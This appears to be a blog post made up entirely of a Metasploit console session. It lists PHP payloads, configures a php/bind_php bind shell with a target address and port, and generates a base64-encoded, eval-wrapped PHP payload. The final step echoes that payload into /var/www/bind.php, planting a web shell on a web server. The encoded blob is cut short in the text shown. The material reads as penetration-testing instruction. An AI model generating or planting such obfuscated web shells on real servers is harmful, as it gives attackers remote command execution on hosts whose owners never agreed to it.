- _
- | | o
- _ _ _ _ _|_ __, , _ | | __ _|_
- / |/ |/ | |/ | / | / \_|/ \_|/ / \_| |
- | | |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
- /|
- \|
- =[ metasploit v3.5.2-beta [core:3.5 api:1.0]
- + -- --=[ 644 exploits - 328 auxiliary
- + -- --=[ 216 payloads - 27 encoders - 8 nops
- =[ svn r11722 updated 4 days ago (2011.02.08)
- msf > search php
- [*] Searching loaded modules for pattern 'php'...
- <--BIG SNIP-->
- NOP Generators
- ==============
- Name Disclosure Date Rank Description
- ---- --------------- ---- -----------
- php/generic normal PHP Nop Generator
- Payloads
- ========
- Name Disclosure Date Rank Description
- ---- --------------- ---- -----------
- php/bind_perl normal PHP Command Shell, Bind TCP (via perl)
- php/bind_php normal PHP Command Shell, Bind TCP (via php)
- php/download_exec normal PHP Executable Download and Execute
- php/exec normal PHP Execute Command
- php/meterpreter/bind_tcp normal PHP Meterpreter, Bind TCP Stager
- php/meterpreter/reverse_tcp normal PHP Meterpreter, PHP Reverse TCP stager
- php/meterpreter_reverse_tcp normal PHP Meterpreter, Reverse TCP Inline
- php/reverse_perl normal PHP Command, Double reverse TCP connection (via perl)
- php/reverse_php normal PHP Command Shell, Reverse TCP (via php)
- php/shell_findsock normal PHP Command Shell, Find Sock
- msf > use php/bind_php
- msf payload(bind_php) > show options
- Module options (payload/php/bind_php):
- Name Current Setting Required Description
- ---- --------------- -------- -----------
- LPORT 4444 yes The listen port
- RHOST no The target address
- msf payload(bind_php) > set RHOST 192.168.1.5
- RHOST => 192.168.1.5
- msf payload(bind_php) > set LPORT 4321
- LPORT => 4321
- msf payload(bind_php) > generate -h
- Usage: generate [options]
- Generates a payload.
- OPTIONS:
- -E Force encoding.
- -b <opt> The list of characters to avoid: '\x00\xff'
- -e <opt> The name of the encoder module to use.
- -f <opt> The output file name (otherwise stdout)
- -h Help banner.
- -i <opt> the number of encoding iterations.
- -k Keep the template executable functional
- -o <opt> A comma separated list of options in VAR=VAL format.
- -p <opt> The Platform for output.
- -s <opt> NOP sled length.
- -t <opt> The output format: raw,ruby,rb,perl,pl,c,js_be,js_le,java,dll,exe,exe-small,elf,macho,vba,vbs,loop-vbs,asp,war
- -x <opt> The executable template to use
- msf payload(bind_php) > generate -t raw -e php/base64
- eval(base64_decode(CQkKCQkJQHNldF90aW1lX2xpbWl0KDApOyBAaWdub3JlX3VzZXJfYWJvcnQoMSk7IEBpbmlfc2V0KCdtYXhfZXhlY3V0aW9uX3RpbWUnLDApOwoJCQkkVXZITFBXdXsKCQkJCQkkby49ZnJlYWQoJHBpcGVzWzFdL3NlKCRtc2dzb2NrKTsK));<--BIG SNIP-->
- msf payload(bind_php) > exit
- root@pentest101-desktop:/var/www# echo '<?php eval(base64_decode(CQkKCQkJQHNldF90aW1lX2xpbWl0KDApOyBAaWdub3JlX3VzZXJfYWJvcnQoMSk7IEBpbmlfc2V0KCdtYXhfZXhlY3V0aW9uX3RpbWUnLDApOwoJCQkkVXZITFBXdXsKCQkJCQkkby49ZnJlYWQoJHBpcGVzWzFdL3NlKCRtc2dzb2NrKTsK)); ?>' > bind.phpsec-worldweb.blogspot.com
0 Comments
